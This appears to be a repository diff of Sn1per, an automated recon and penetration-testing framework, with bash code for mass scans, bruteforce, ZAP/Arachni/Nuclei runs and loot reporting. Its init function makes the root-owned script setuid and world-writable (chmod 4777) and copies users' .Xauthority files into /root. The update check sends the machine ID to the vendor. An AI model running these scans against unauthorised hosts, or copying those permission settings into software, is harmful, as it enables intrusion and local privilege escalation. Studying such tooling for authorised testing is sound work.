cp -f $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-https.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
fi
if [[ "$ARACHNI_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
DATE=$(date +"%Y%m%d%H%M")
PORT="80"
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
DATE=$(date +"%Y%m%d%H%M")
PORT="443"
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives https://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target http://$TARGET -o $LOOT_DIR/web/nuclei-http-${TARGET}-port80.txt
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target https://$TARGET -o $LOOT_DIR/web/nuclei-https-${TARGET}-port443.txt
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
fi
source $INSTALL_DIR/modes/sc0pe.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
loot
exit
fi

37
pro/notepad.html Normal file
View File

@@ -0,0 +1,37 @@
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Notepad App</title>
<meta charset="utf-8">
<!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<style>
html,body{background:#FCFCFC;color:#444;height:100%;width:100%;margin:0;padding:0;overflow:hidden}
#notepad{height:100%;width:100%;padding:1%;font-size:12px;line-height:100%;font-family:Menlo,Monaco,Consolas,"Courier New",monospace;box-sizing:border-box}
::selection{background:#7D7}
::-moz-selection{background:#7D7}
</style>
</head>
<body>
<textarea placeholder="Type here, see it here..." id="notepad">
<!--
you could do any element w/ contentEditable, but that doesn't fire onchange
-->
</textarea>
<script>
/* localstorage polyfill from https://gist.github.com/350433 */
("undefined"==typeof window.localStorage||"undefined"==typeof window.sessionStorage)&&function(){function e(f){function e(a){var b;b=new Date;b.setTime(b.getTime()+31536E6);document.cookie="localStorage="+a+("; expires="+b.toGMTString())+"; path=/"}function g(a){a=JSON.stringify(a);"session"==f?window.name=a:e(a)}var d=function(){var a;if("session"==f)a=window.name;else a:{a=document.cookie.split(";");var b,c;for(b=0;b<a.length;b++){for(c=a[b];" "==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf("localStorage=")){a=
c.substring(13,c.length);break a}}a=null}return a?JSON.parse(a):{}}();return{length:0,clear:function(){d={};this.length=0;"session"==f?window.name="":e("")},getItem:function(a){return void 0===d[a]?null:d[a]},key:function(a){var b=0,c;for(c in d){if(b==a)return c;b++}return null},removeItem:function(a){delete d[a];this.length--;g(d)},setItem:function(a,b){d[a]=b+"";this.length++;g(d)}}}if("undefined"==typeof window.localStorage)window.localStorage=new e("local");if("undefined"==typeof window.sessionStorage)window.sessionStorage=
new e("session")}();
/* the code */
var n = document.getElementById("notepad");
/* save */
var s = function(){localStorage.setItem("notepad", n.value);}
/* retrieve (only on page load) */
if(window.localStorage){ n.value = localStorage.getItem("notepad");}
/* autosave onchange and every 500ms and when you close the window */
n.onchange = s();
setInterval( s, 500);
window.onunload = s();
</script>
</body></html>

12
sn1per.desktop Normal file
View File

@@ -0,0 +1,12 @@
[Desktop Entry]
Name=sn1per
Encoding=UTF-8
Exec=bash-wrapper "sudo sniper"
Icon=/usr/share/pixmaps/sn1per.png
StartupNotify=false
Terminal=true
Type=Application
Categories=08-exploitation-tools;02-vulnerability-analysis;01-info-gathering;
X-Kali-Package=sn1per
Comment=
Path=

BIN
sn1per.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.2 KiB

693
sniper Normal file
View File

@@ -0,0 +1,693 @@
#!/bin/bash
# + -- --=[Sn1per Community Edition by @xer0dayz
# + -- --=[https://sn1persecurity.com
#
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
exit 1
fi
VER="9.2"
INSTALL_DIR="/usr/share/sniper"
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
SNIPER_PRO=$INSTALL_DIR/pro.sh
# INIT POSTGRESQL
service postgresql start 2> /dev/null
# LOAD DEFAULT SNIPER CONFIGURATION FILE
dos2unix $INSTALL_DIR/sniper.conf 2> /dev/null > /dev/null
source $INSTALL_DIR/sniper.conf
echo -e "$OKBLUE[*]$RESET Loaded configuration file from $INSTALL_DIR/sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [[ -f /root/.sniper.conf ]]; then
# LOAD USER SN1PER CONFIGURATION FILE
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
source /root/.sniper.conf
echo -e "$OKBLUE[*]$RESET Loaded configuration file from /root/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [[ -f /root/.sniper_api_keys.conf ]]; then
# LOAD USER API KEYS (PERSISTENT CONFIG)
dos2unix /root/.sniper_api_keys.conf 2> /dev/null > /dev/null
source /root/.sniper_api_keys.conf
echo -e "$OKBLUE[*]$RESET Loaded API keys from /root/.sniper_api_keys.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
else
# IF NO USER CONFIG PRESENT, CREATE IT FROM THE DEFAULT TEMPLATE
cp $INSTALL_DIR/sniper.conf /root/.sniper.conf 2> /dev/null
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
source /root/.sniper.conf
echo -e "$OKBLUE[*]$RESET Loaded configuration file from /root/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
function help {
logo
local star
printf -v star "$OKBLUE[*]$RESET"
cat <<EOHELP
$star NORMAL MODE
sniper -t <TARGET>
$star SPECIFY CUSTOM CONFIG FILE
sniper -c /full/path/to/sniper.conf -t <TARGET> -m <MODE> -w <WORKSPACE>
$star NORMAL MODE + OSINT + RECON
sniper -t <TARGET> -o -re
$star STEALTH MODE + OSINT + RECON
sniper -t <TARGET> -m stealth -o -re
$star DISCOVER MODE
sniper -t <CIDR> -m discover -w <WORSPACE_ALIAS>
$star SCAN ONLY SPECIFIC PORT
sniper -t <TARGET> -m port -p <portnum>
$star FULLPORTONLY SCAN MODE
sniper -t <TARGET> -fp
$star WEB MODE - PORT 80 + 443 ONLY!
sniper -t <TARGET> -m web
$star HTTP WEB PORT MODE
sniper -t <TARGET> -m webporthttp -p <port>
$star HTTPS WEB PORT MODE
sniper -t <TARGET> -m webporthttps -p <port>
$star HTTP WEBSCAN MODE
sniper -t <TARGET> -m webscan
$star ENABLE BRUTEFORCE
sniper -t <TARGET> -b
$star AIRSTRIKE MODE
sniper -f targets.txt -m airstrike
$star NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f targets.txt -m nuke -w <WORKSPACE_ALIAS>
$star MASS PORT SCAN MODE
sniper -f targets.txt -m massportscan -w <WORKSPACE_ALIAS>
$star MASS WEB SCAN MODE
sniper -f targets.txt -m massweb -w <WORKSPACE_ALIAS>
$star MASS WEBSCAN SCAN MODE
sniper -f targets.txt -m masswebscan -w <WORKSPACE_ALIAS>
$star MASS VULN SCAN MODE
sniper -f targets.txt -m massvulnscan -w <WORKSPACE_ALIAS>
$star PORT SCAN MODE
sniper -t <TARGET> -m port -p <PORT_NUM>
$star LIST WORKSPACES
sniper --list
$star DELETE WORKSPACE
sniper -w <WORKSPACE_ALIAS> -d
$star DELETE HOST FROM WORKSPACE
sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh
$star DELETE TASKS FROM WORKSPACE
sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dt
$star GET SNIPER SCAN STATUS
sniper --status
$star LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport
$star LOOT REIMPORTALL FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimportall
$star LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reload
$star LOOT EXPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --export
$star SCHEDULED SCANS
sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly
$star USE A CUSTOM CONFIG
sniper -c /path/to/sniper.conf -t <TARGET> -w <WORKSPACE_ALIAS>
$star UPDATE SNIPER
sniper -u|--update
EOHELP
exit
}
function logo {
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[ https://sn1persecurity.com$RESET"
echo -e "$OKORANGE + -- --=[ Sn1per v$VER by @xer0dayz$RESET"
echo ""
}
function sniper_status {
watch -n 1 -c 'ps -ef | egrep "sniper|slurp|hydra|ruby|python|dirsearch|amass|nmap|metasploit|curl|wget|nikto" && echo "NETWORK CONNECTIONS..." && netstat -an | egrep "TIME_WAIT|EST"'
}
# CHECK FOR UPDATES
function check_update {
if [[ "$ENABLE_AUTO_UPDATES" == "1" ]] && [[ "$ONLINE" == "1" ]]; then
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [[ "$LATEST_VER" != "$VER" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper -u\" $RESET"
fi
fi
touch /tmp/update-check.txt 2> /dev/null
}
# APPLY UPDATES
function update {
logo
echo -e "$OKBLUE[*]$RESET Checking for updates...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
if [[ "$ONLINE" == "0" ]]; then
echo "You will need to download the latest release manually at https://github.com/1N3/Sn1per/"
else
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [[ "$LATEST_VER" != "$VER" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
read ans
if [[ "$ans" = "y" ]]; then
rm -Rf /tmp/Sn1per/ 2>/dev/null
git clone https://github.com/1N3/Sn1per /tmp/Sn1per/
cd /tmp/Sn1per/
chmod +rx install.sh
bash install.sh
rm -Rf /tmp/Sn1per/ 2>/dev/null
exit
fi
fi
fi
}
if [[ "$UPDATE" = "1" ]]; then
update
exit
fi
# CHECK IF ONLINE
function check_online {
ONLINE=$(curl --connect-timeout 3 --insecure -s "https://sn1persecurity.com/community/updates.txt?$VER&mid=$(cat /etc/machine-id)" 2> /dev/null)
if [[ -z "$ONLINE" ]]; then
ONLINE=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
if [[ -z "$ONLINE" ]]; then
ONLINE="0"
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKRED}FAIL${RESET}$OKBLUE]"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET sniper is running in offline mode.$RESET"
else
ONLINE="1"
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
else
ONLINE="1"
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
}
# COMMAND LINE SWITCHES
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
-h|--help)
help
shift # past argument
;;
-c|--config)
CONFIG="$2"
echo -e "$OKBLUE[*]$RESET Creating backup of existing config to /root/.sniper.conf.bak...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cp -f /root/.sniper.conf /root/.sniper.conf.bak
echo -e "$OKBLUE[*]$RESET Copying $CONFIG to /root/.sniper.conf...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cp -f $CONFIG /root/.sniper.conf 2> /dev/null
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
source /root/.sniper.conf
sleep 1
shift
shift
;;
-t)
TARGET="$2"
shift # past argument
shift # past argument
;;
-b)
AUTO_BRUTE="1"
shift # past argument
;;
-fp|--fullportscan)
FULLNMAPSCAN="1"
shift # past argument
;;
-o|--osint)
OSINT="1"
shift # past argument
;;
-re|--recon)
RECON="1"
shift # past argument
;;
-m)
MODE="$2"
shift # past argument
shift # past argument
;;
-p)
PORT="$2"
shift # past argument
shift # past argument
;;
-f|--file)
FILE="$(realpath $2)"
shift # past argument
shift # past argument
;;
-ri|--reimport)
REIMPORT="1"
shift # past argument
;;
-ria|--reimportall)
REIMPORT_ALL="1"
shift # past argument
;;
-rl|--reload)
RELOAD="1"
shift # past argument
;;
-n|--noreport)
REPORT="0"
shift # past argument
;;
-nl|--noloot)
LOOT="0"
NOLOOT="1"
shift # past argument
;;
-w)
WORKSPACE="$(echo $2 | tr / -)"
WORKSPACE_DIR="$INSTALL_DIR/loot/workspace/$WORKSPACE"
shift # past argument
shift # past argument
;;
-s|--schedule)
if [[ -z "$WORKSPACE" ]]; then
echo "You need to set a workspace via the -w switch to schedule a scan task."
exit
fi
SCHEDULE_ARG="$2"
if [[ "$SCHEDULE_ARG" = "daily" ]] || [[ "$SCHEDULE_ARG" = "weekly" ]] || [[ "$SCHEDULE_ARG" = "monthly" ]]; then
SCHEDULE_TASK="$WORKSPACE_DIR/scans/scheduled/$SCHEDULE_ARG.sh"
vim $SCHEDULE_TASK
cat $WORKSPACE_DIR/scans/scheduled/*.sh 2> /dev/null
exit
else
echo "You need to specify either daily, weekly or monthly for the scheduled scan argument."
exit
fi
shift # past argument
shift # past argument
;;
-d|--delete)
logo
echo "Are you sure you want to remove the following workspace? (Hit Ctrl+C to exit): /usr/share/sniper/loot/workspace/$WORKSPACE/"
read ANS
rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/
echo "Workspace /usr/share/sniper/loot/workspace/$WORKSPACE/ was removed."
sniper -w default --reimport
exit
shift # past argument
;;
-dh|--delete-host)
echo "Removing $TARGET from $WORKSPACE"
sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/* $WORKSPACE_DIR/reports/host-table-report.csv
egrep -R "$TARGET" $WORKSPACE_DIR/domains/* $WORKSPACE_DIR/reports/host-table-report.csv
rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null
rm -f $WORKSPACE_DIR/nmap/dns-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/nmap/ports-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/web/title-*-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/web/headers-*-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null
rm -f $WORKSPACE_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
rm -f $WORKSPACE_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null
#sniper --reimportall -w $WORKSPACE
exit
shift # past argument
;;
-dt|--delete-task)
echo "Removing all running $TARGET tasks from $WORKSPACE"
rm -vf $WORKSPACE_DIR/scans/running_$TARGET_*.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $WORKSPACE_DIR/scans/tasks-running.txt 2> /dev/null
ps -ef | egrep "$TARGET|sniper"
ps -ef | egrep "sniper" | awk '{print $2}' | xargs -i sudo kill -9 {}
exit
shift # past argument
;;
--list)
logo
ls -l $INSTALL_DIR/loot/workspace/
echo ""
echo "cd /usr/share/sniper/loot/workspace/"
WORKSPACE_REPORT=$LOOT_DIR/sniper-report.html
if [[ -f $WORKSPACE_REPORT ]]; then
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
$BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null &
else
echo -e "$OKORANGE + -- --=[ Loading workspaces...$RESET"
$BROWSER $INSTALL_DIR/loot/workspace/ 2> /dev/null > /dev/null &
fi
exit
shift
;;
--export)
if [[ -z "$WORKSPACE" ]]; then
echo "You need to set a workspace via the -w switch to export a workspace."
exit
fi
echo "Archiving $WORKSPACE to $INSTALL_DIR/loot/$WORKSPACE.tar"
cd $INSTALL_DIR/loot/workspace/ && tar -cvf ../$WORKSPACE.tar $WORKSPACE
cp -Rf $WORKSPACE ${WORKSPACE}_`date +"%Y-%m-%d"`
echo "Done!"
exit
shift
;;
-s|--status)
sniper_status
exit
shift
;;
-u|--update)
UPDATE="1"
update
exit
shift # past argument
;;
*) # unknown option
POSITIONAL+=("$1") # save it in an array for later
echo "Unknown scan option $POSITIONAL...refer to the help menu for usage details."
exit
shift # past argument
;;
esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters
if [[ ! -z "$TARGET" ]] && [[ -z "$WORKSPACE" ]]; then
WORKSPACE=$(echo "$TARGET")
fi
if [[ -z "$TARGET" ]] && [[ -z "$WORKSPACE" ]]; then
logo
echo "You need to specify a target or workspace to use. Type sniper --help for command usage."
exit
fi
cd $INSTALL_DIR
function init {
if [[ ! -z $WORKSPACE_DIR ]]; then
LOOT_DIR=$WORKSPACE_DIR
fi
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/nul
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/ips 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/osint 2> /dev/null
mkdir $LOOT_DIR/credentials 2> /dev/null
mkdir $LOOT_DIR/web 2> /dev/null
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir -p $LOOT_DIR/scans/scheduled/ 2> /dev/null
touch $LOOT_DIR/scans/scheduled/daily.sh 2> /dev/null
touch $LOOT_DIR/scans/scheduled/weekly.sh 2> /dev/null
touch $LOOT_DIR/scans/scheduled/monthly.sh 2> /dev/null
touch $LOOT_DIR/scans/notifications.txt 2> /dev/null
touch $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
chmod 777 -Rf $INSTALL_DIR 2> /dev/null
chown root $INSTALL_DIR/sniper 2> /dev/null
chmod 4777 $INSTALL_DIR/sniper 2> /dev/null
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
rm -f /tmp/out_of_scope 2> /dev/null
for key in "${OUT_OF_SCOPE[@]}"; do echo $TARGET | egrep ${key} >> /tmp/out_of_scope 2> /dev/null; done;
OUT_OF_SCOPE_NUM=$(wc -l /tmp/out_of_scope 2> /dev/null | awk '{print $1}' 2> /dev/null)
if [[ $OUT_OF_SCOPE_NUM > 0 ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] $TARGET is out of scope. Skipping! $RESET"
exit
else
echo -e "$OKBLUE[*]$RESET Scanning $TARGET $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 2> /dev/null
fi
service postgresql start 2> /dev/null > /dev/null
msfdb start 2> /dev/null > /dev/null
chown root /run/user/1000/gdm/Xauthority 2> /dev/null
LAST_USER=$(last | head -n 1 | awk '{print $1}')
sudo cp -a /home/$LAST_USER/.Xauthority /root/.Xauthority 2> /dev/null
sudo cp -a /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
sudo cp -a /home/$USER/.Xauthority /root/.Xauthority 2> /dev/null
sudo cp -a /home/kali/.Xauthority /root/.Xauthority 2> /dev/null
sudo chown root: /root/.Xauthority 2> /dev/null
XAUTHORITY=/root/.Xauthority
UPDATED_TARGETS=$LOOT_DIR/scans/updated.txt
if [[ "$AUTO_BRUTE" == "1" ]]; then
echo "$TARGET AUTO_BRUTE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-AUTO_BRUTE.txt 2> /dev/null
fi
if [[ "$FULLNMAPSCAN" == "1" ]]; then
echo "$TARGET fullnmapscan `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-fullnmapscan.txt 2> /dev/null
fi
if [[ "$OSINT" == "1" ]]; then
echo "$TARGET osint `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-osint.txt 2> /dev/null
fi
if [[ "$RECON" == "1" ]]; then
echo "$TARGET recon `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
fi
}
function loot {
if [[ ! $LOOT == "0" ]]; then
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
if [[ ! -z $WORKSPACE_DIR ]]; then
LOOT_DIR=$WORKSPACE_DIR
fi
rm -f $INSTALL_DIR/stash.sqlite 2> /dev/null
rm -f $INSTALL_DIR/hydra.restore 2> /dev/null
rm -f /tmp/update-check.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
echo -e "$OKBLUE[*]$RESET Opening loot directory $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
cd $LOOT_DIR
if [[ "$METASPLOIT_IMPORT" == "1" ]]; then
echo -e "$OKORANGE + -- --=[ Starting Metasploit service...$RESET"
/etc/init.d/metasploit start 2> /dev/null > /dev/null
msfdb start
echo -e "$OKORANGE + -- --=[ Importing NMap XML files into Metasploit...$RESET"
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" | tee $LOOT_DIR/notes/msf-$WORKSPACE.txt
fi
echo -e "$OKORANGE + -- --=[ Generating reports...$RESET"
cd $LOOT_DIR/output 2> /dev/null
echo -en "$OKGREEN[$OKBLUE"
for a in `ls sniper-*.txt 2>/dev/null`;
do
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
echo -n '|'
done
echo -en "$OKGREEN]$RESET"
echo ""
cd ..
chmod 777 -Rf $LOOT_DIR
echo -e "$OKORANGE + -- --=[ Sorting all files...$RESET"
cat $LOOT_DIR/scans/notifications_new.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
sort -u $LOOT_DIR/domains/*-full.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null
sed -E "s/^\.//g" $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets.txt 2> /dev/null > $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null
sed -E "s/^\.//g" $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sed -i -E 's/address//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/domains-all-presorted2.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
rm -f $LOOT_DIR/domains/targets-all-presorted.txt $LOOT_DIR/domains/targets-all-presorted2.txt 2> /dev/null
rm -f $LOOT_DIR/domains/domains-all-presorted.txt $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
sort -u $LOOT_DIR/nmap/openports-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/openports-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
find $LOOT_DIR/web/ -type f -size -1c -exec rm -f {} \;
cd $LOOT_DIR/web/ && rm -f webhosts-all-sorted-* 2> /dev/null
cd $LOOT_DIR/domains/ && rm -f domains-all-sorted-* 2> /dev/null
